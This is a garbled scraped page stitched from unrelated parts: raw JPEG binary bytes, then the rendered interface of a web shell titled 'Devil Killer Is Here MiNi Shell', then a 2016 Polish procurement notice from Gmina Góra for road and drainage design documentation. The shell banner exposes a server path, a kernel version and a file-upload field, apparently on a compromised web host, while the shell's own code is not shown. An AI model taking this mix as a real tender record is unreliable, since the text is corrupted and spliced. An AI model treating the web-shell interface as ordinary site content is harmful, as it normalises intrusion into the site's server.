JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160603/67615-N-2016.html

<p class="kh_header"><b>Góra: Opracowanie dokumentacji projektowo- kosztorysowych dla  następujących zadań inwestycyjnych:
Utwardzenie i odwodnienie placu przy garażach ul. Dąbrówki w m. Góra
Wymiana nawierzchni drogi i chodników przy ul. Mickiewicza w m. Góra</b><br>
<b>Numer ogłoszenia: 67615 - 2016; data zamieszczenia: 03.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Góra , ul. Mickiewicza 1, 56-200 Góra, woj. dolnośląskie, tel. 065 5443644, faks 065/543-26-58.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gora.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo- kosztorysowych dla  następujących zadań inwestycyjnych:
Utwardzenie i odwodnienie placu przy garażach ul. Dąbrówki w m. Góra
Wymiana nawierzchni drogi i chodników przy ul. Mickiewicza w m. Góra.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 Utwardzenie i odwodnienie placu przy garażach ul. Dąbrówki w m. Góra

Inwestycja zlokalizowana na działce 604/244
Zamiar inwestycyjny obejmuje  drogi  i podjazdy  w kompleksie garażowym przy ul. Dąbrówki w m. Góra . Planowaną nawierzchnię należy przyjąć z kostki wibroprasowanej typu kość o gr. 8 cm w kolorze szarym na konstrukcji KR-2 . Odległość między garażami należy podzielić na drogę dojazdową , obustronny ściek uliczny i podjazd do garaży w pełnym zakresie .
Włączenie dróg wyjazdowych z kompleksu garaży jest zlokalizowane w ul. Dąbrówki szt. 2 ( jak na załączniku nr 4 ) . 
Należy zinwentaryzować istniejącą sieć kanalizacji deszczowej oraz zaprojektować brakujące jej odcinki. 
Teren  dróg  między garażami należy oświetlić oświetleniem typu LED zasilanym  energią elektryczną . Ilość punktów oświetleniowych należy dobrać wg. normy oraz uzgodnić z inwestorem .



Opracowanie dokumentacji projektowo-kosztorysowej będzie zawierać:
mapę do celów projektowych ,
pomiary poprzeczne co 25,00 mb i pomiar podłużny , 
projekt tymczasowej organizacji ruchu na czas realizacji zadania i stałej organizacji ruchu wraz z uzgodnieniem z jednostką zarządzającą ruchem drogowym potwierdzonym wydanym postanowieniem,
dokumentacja projektowa w zakresie niezbędnym do uzyskania decyzji o pozwoleniu na budowę - 7 egz.,
kosztorysy inwestorskie  - 2 egz.
specyfikacje techniczne wykonania i odbioru robót - 2 egz.
założenia do  informacji dotyczącej  bezpieczeństwa i ochrony zdrowia (BiOZ) - 2 egz.

	Część 2   Wymiana nawierzchni drogi i chodników przy ul. Mickiewicza w m. Góra

Inwestycja zlokalizowana na działkach nr  1080 , 1032/1 , 1032/2 , 1078/3 , 1078/6 , 1912 , 
    1919 , 1947 , 2060. 
Zamiar inwestycyjny obejmuje :
drogę : 
ułożenie obustronnego ścieku z kostki granitowej o szerokości 30 cm  , regulacja studni kanalizacji sanitarnej i kanalizacji deszczowej , 
po wykonaniu pomiarów poprzecznych uwzględnić uzupełnienie wpustów ulicznych w celu prawidłowego odprowadzenia wód opadowych i roztopowych z powierzchni drogi, chodników i parkingów przy Urzędzie Gminy i Starostwie Powiatowym , 
ułożenie warstwy wyrównawczej z masy asfaltowej , wykonanie warstwy ścieralnej szer. do 6.0 m ( grubość warstw w zależności od wykonania pomiarów poprzecznych i podłużnych ) , 
odtworzenie oznakowania poziomego ,
na wysokości UMiG parking z kostki betonowej , miejsca parkingowe wydzielone kostką granitową + chodnik z kostki granitowej na długości budynku urzędu .

Długość drogi około 850,00 mb ( od ul. Kościuszki wzdłuż parku miejskiego , terenu Ośrodka Kultury Fizycznej dalej za basen miejski około 50,0 mb  ) ,

chodniki :  
wymiana  części  chodników wzdłuż ul. Mickiewicza , ( miejsca będą wskazane przez Inwestora ) .
chodnik z kostki wibroprasowanej gr. 8 cm w kolorze szarym , zjazdy na posesję gr. 8 cm w kolorze grafitowym na konstrukcji odpowiadającym warunkom terenowym ,
szerokość chodników 1,5-2,0 m i długości około 710,00 mb będzie konsultowana na bieżąco podczas opracowania dokumentacji .


Opracowanie dokumentacji projektowo-kosztorysowej będzie zawierać:
mapę do celów opiniodawczych,
pomiary poprzeczne co 25,00 mb i pomiar podłużny , 
dokumentacja projektowa 
projekt tymczasowej organizacji ruchu na czas realizacji zadania wraz z uzgodnieniem   z jednostką zarządzającą ruchem drogowym potwierdzonym wydanym postanowieniem , 
dokumentacja projektowa w zakresie niezbędnym do zgłoszenia robót nie wymagających pozwolenia na budowę - 7 egz.,
kosztorysy inwestorskie  - 2 egz.
specyfikacje techniczne wykonania i odbioru robót - 2 egz.
założenia do  informacji dotyczącej  bezpieczeństwa i ochrony zdrowia (BiOZ) - 2 egz.
OBOWIĄZKI WYKONAWCÓW W RAMACH OBU CZĘŚCI
Przygotować dokumentację dla obu  zakresów  w wersji elektronicznej na nośniku CD w formacie PDF, umożliwiającej opublikowanie zamówienia publicznego w Internecie - 2 szt. CD  z zastrz. iż przedmiary winny być zapisane w odrębnych plikach, również w programie do kosztorysowania. 
Dokumentacja projektowa winna czynić zadość wymaganiom zawartym w Rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego z późniejszymi zmianami.

 UWAGA : Koncepcję należy uzgodnić z Zamawiającym. 


3.3. DODATKOWE OBOWIĄZKI WYKONAWCY 
W ramach rękojmi i gwarancji Wykonawca będzie zobowiązany  do:
 - jednorazowej  aktualizacji kosztorysów  inwestorskich ( odrębnie dla każdego z etapów - wg. wskazań Zamawiającego )  w terminie wskazanym przez Zamawiającego. Termin wykonania  14 dni od daty przesłania stosownego pisma Zamawiającego za pomocą faxu lub poczty elektronicznej,
- wyjaśniania i/lub wprowadzania zmian na etapie postępowania o udzielenie zamówienia publicznego w terminach i na zasadach opisanych w projekcie umowy,

-	uzupełniania szczegółów dokumentacji projektowej, wyjaśniania wykonawcy robót budowlanych wątpliwości  powstałych w toku realizacji tych robót bądź udzielania wyjaśnień dot. dokumentacji w trakcie ogłoszenia przetargu na wykonanie robót.
- udzielania w terminie wskazanym przez Zamawiającego wyjaśnień / odpowiedzi za pośrednictwem Zamawiającego potencjalnym oferentom, uczestniczącym w postępowaniu o udzielenie zamówienia publicznego, w którym przedmiotowa dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót stanowią opis przedmiotu zamówienia lub wprowadzenia zmian w dokumentacji, jeżeli konieczność ich wprowadzenia wynika z winy Wykonawcy,
Termin wykonania 3 dni od daty przesłania treści zapytań Wykonawców i/lub informacji wskazujących na konieczność wprowadzenia zmian za pomocą faxu lub poczty elektronicznej.
- wprowadzić zmiany w dokumentacji na etapie wykonawstwa , jeżeli konieczność ich wprowadzenia wynika z przyczyn leżących po stronie Wykonawcy.



Przedmiot zamówienia winien być wykonany  zgodnie z obowiązującymi przepisami prawa w zakresie wystarczającym do zgłoszenia robót i przeprowadzenia procedury o udzielenie zamówienia publicznego w trybie ustawy Prawo zamówień publicznych ( tekst jednolity Dz. U. z 2015 r., poz. 2164 ).
Wykonawca przy opracowywaniu dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót, które następnie służyć będzie jako opis przedmiotu zamówienia w postępowaniu o udzielenie zamówienia publicznego zobowiązany jest do stosowania się do zapisów art. 29 i 30 ustawy Prawo zamówień publicznych . Zastosowane materiały i urządzenia nie mogą być opisane przez wskazanie znaków towarowych, patentów lub pochodzenia, a wskazane muszą zawierać zapis lub równoważne.
Przy użyciu zapisów: dopuszcza się rozwiązania równoważne projektant załączy do dokumentacji kartę rozwiązań równoważnych, w której opisuje możliwie dokładnie kryteria parametry  decydujące o równoważności.
Wykonawca wykona przedmiot zamówienia zgodnie z obowiązującymi w tym zakresie przepisami 

prawa w szczególności zgodnie z:
Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej , specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego Dz. U. z 2013 r. poz. 1129.
Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 	( Dz. U. z 2011 r. ,Nr 165,  poz.  987 )
Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie  określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-uzytkowym (Dz. U. Nr 130, poz. 1389).
ustawą Prawo budowlane ( t.j. Dz. U. z 2016 r., poz. 290 ).
Ponadto Wykonawca winien opracować dokumentację projektową  w szczegółowości umożliwiającej Zamawiającemu ogłoszenie postępowania przetargowego na realizację zadania z ryczałtowym wynagrodzeniem Wykonawcy robót budowlanych. W tym przypadku przedmiar ma charakter wyłącznie uzupełniający i Zamawiający nie jest zobligowany do przekazania go Wykonawcy robót budowlanych w ramach SIWZ. Wszelkie informacje dotyczące zakresu i charakteru robót przedmiotowej inwestycji Wykonawca robót budowlanych winien uzyskać  na podstawie dokumentacji projektowej. 
Wykonawca uzyska wszystkie, jeżeli są niezbędne dla opracowania kompletnej dokumentacji projektowej, wymagane prawem i przepisami decyzje administracyjne, warunki techniczne, uzgodnienia konserwatorskie, opinie i uzgodnienia dotyczące przedmiotu zamówienia.

Dokumentacja projektowa lub część stanowiąca umowny przedmiot odbioru powinny być zaopatrzone w wykaz opracowań oraz w pisemne oświadczenie Wykonawcy, że są wykonane zgodnie z umową, obowiązującymi przepisami techniczno - budowlanymi oraz normami i że zostają wydane w stanie kompletnym z punktu widzenia celu, któremu mają służyć.
Wykaz opracowań oraz pisemne oświadczenie, o którym mowa wyżej, stanowią integralną część przedmiotu odbioru..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie ustanowiono obowiązku wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2015 r., poz. 2164.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2015 r., poz. 2164.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2015 r., poz. 2164.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2015 r., poz. 2164.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do wykazania spełniania  warunku udziału w postępowaniu Zamawiający uzna za właściwe złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, wskazanych przez ustawodawcę w art. 22 ust. 1 ustawy Prawo zamówień publicznych ( t.j. Dz. U. z 2015 r., poz. 2164.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wskazane w pkt 6 przedmiotowej SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>l. Wykonawcy niemożliwe z przyczyn od niego niezależnych, o ściśle obiektywnym charakterze, a konieczność zmiany zostanie odpowiednio udokumentowana. Termin zostanie przedłużony o czas równy okresowi trwania przeszkody.
2.	Istotne zmiany umowy są możliwe w sytuacji  wystąpienia okoliczności zmierzających do prawidłowej realizacji przedmiotu umowy, obniżenia kosztów, zapewnienia optymalnych parametrów technicznych i jakościowych, optymalizacji założonego efektu.
3. Dopuszcza się zmianę zakresu projektowania z przyczyn wynikających z uzgodnień, w szczególności  z WDKZ lub ograniczeń powierzchniowych i/lub funkcjonalnych.
Wówczas po zbadaniu okoliczności prawnych i faktycznych dopuszczalne jest wydłużenie terminu realizacji przedmiotu umowy, a także wzrost wynagrodzenia po zbadaniu zasadności ceny zaproponowanej przez Wykonawcę w oparciu o realia rynku usług projektowych.
4.	Warunki zmian : 
a)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b)	forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.
Dokładny opis i warunki zmian zawiera projekt umowy stanowiący załącznik do siwz.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gora.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2016 godzina 12:00, miejsce: Urząd Miasta i Gminy w Górze, ul. Mickiewicza 1, 56-200 Góra, pokój nr 101- sekretariat, I piętro budynku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utwardzenie i odwodnienie placu przy garażach ul. Dąbrówki w m. Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inwestycja zlokalizowana na działce 604/244
Zamiar inwestycyjny obejmuje  drogi  i podjazdy  w kompleksie garażowym przy ul. Dąbrówki w m. Góra . Planowaną nawierzchnię należy przyjąć z kostki wibroprasowanej typu kość o gr. 8 cm w kolorze szarym na konstrukcji KR-2 . Odległość między garażami należy podzielić na drogę dojazdową , obustronny ściek uliczny i podjazd do garaży w pełnym zakresie .
Włączenie dróg wyjazdowych z kompleksu garaży jest zlokalizowane w ul. Dąbrówki szt. 2 ( jak na załączniku nr 4 ) . 
Należy zinwentaryzować istniejącą sieć kanalizacji deszczowej oraz zaprojektować brakujące jej odcinki. 
Teren  dróg  między garażami należy oświetlić oświetleniem typu LED zasilanym  energią elektryczną . Ilość punktów oświetleniowych należy dobrać wg. normy oraz uzgodnić z inwestorem .



Opracowanie dokumentacji projektowo-kosztorysowej będzie zawierać:
mapę do celów projektowych ,
pomiary poprzeczne co 25,00 mb i pomiar podłużny , 
projekt tymczasowej organizacji ruchu na czas realizacji zadania i stałej organizacji ruchu wraz z uzgodnieniem z jednostką zarządzającą ruchem drogowym potwierdzonym wydanym postanowieniem,
dokumentacja projektowa w zakresie niezbędnym do uzyskania decyzji o pozwoleniu na budowę - 7 egz.,
kosztorysy inwestorskie  - 2 egz.
specyfikacje techniczne wykonania i odbioru robót - 2 egz.
założenia do  informacji dotyczącej  bezpieczeństwa i ochrony zdrowia (BiOZ) - 2 egz.
Dokładny opis zawiera SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana nawierzchni drogi i chodników przy ul. Mickiewicza w m. Góra.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Inwestycja zlokalizowana na działkach nr  1080 , 1032/1 , 1032/2 , 1078/3 , 1078/6 , 1912 , 
    1919 , 1947 , 2060. 
Zamiar inwestycyjny obejmuje :
drogę : 
ułożenie obustronnego ścieku z kostki granitowej o szerokości 30 cm  , 
regulacja studni kanalizacji sanitarnej i kanalizacji deszczowej , 
po wykonaniu pomiarów poprzecznych uwzględnić uzupełnienie wpustów ulicznych w celu prawidłowego odprowadzenia wód opadowych i roztopowych z powierzchni drogi, chodników i parkingów przy Urzędzie Gminy i Starostwie Powiatowym , 
ułożenie warstwy wyrównawczej z masy asfaltowej , wykonanie warstwy ścieralnej szer. do 6.0 m ( grubość warstw w zależności od wykonania pomiarów poprzecznych i podłużnych ) , 
odtworzenie oznakowania poziomego ,
